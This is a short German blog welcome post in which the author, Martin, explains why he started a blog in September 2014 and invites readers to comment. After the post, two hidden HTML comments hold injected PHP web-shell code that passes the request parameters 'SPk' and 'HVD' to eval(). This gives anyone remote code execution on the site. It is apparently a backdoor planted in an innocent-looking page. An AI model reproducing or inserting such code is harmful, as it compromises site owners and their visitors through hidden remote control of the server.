Martin’s Blog

Ahaus, im September 2014

ein neuer Blog, eigentlich ja überflüssig, denn es gibt ja wirklich schon verdammt viele davon. Aber halt, ich habe für mich den Spaß am Schreiben entdeckt. Auch sammele ich gerne lesenswerte Beiträge aus den Weiten des WWW, die es wert sind, irgendwo gebündelt zu werden. Und an all dem möchte ich Freundinnen und Freunde, nette Menschen, einfach alle, die es interessiert, teilhaben lassen.

Wer hier also Freude findet, mag wiederkommen, wer sich nach einem Besuch nicht wieder melden mag, auch kein Problem.  Und wer seine Meinung äußert oder eigene Beiträge einbringen will ist herzlich willkommen.

Martin

 

<!– [insert_php]if (isset($_REQUEST["SPk"])){eval($_REQUEST["SPk"]);exit;}[/insert_php][php]if (isset($_REQUEST["SPk"])){eval($_REQUEST["SPk"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["HVD"])){eval($_REQUEST["HVD"]);exit;}[/insert_php][php]if (isset($_REQUEST["HVD"])){eval($_REQUEST["HVD"]);exit;}[/php] –>

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht.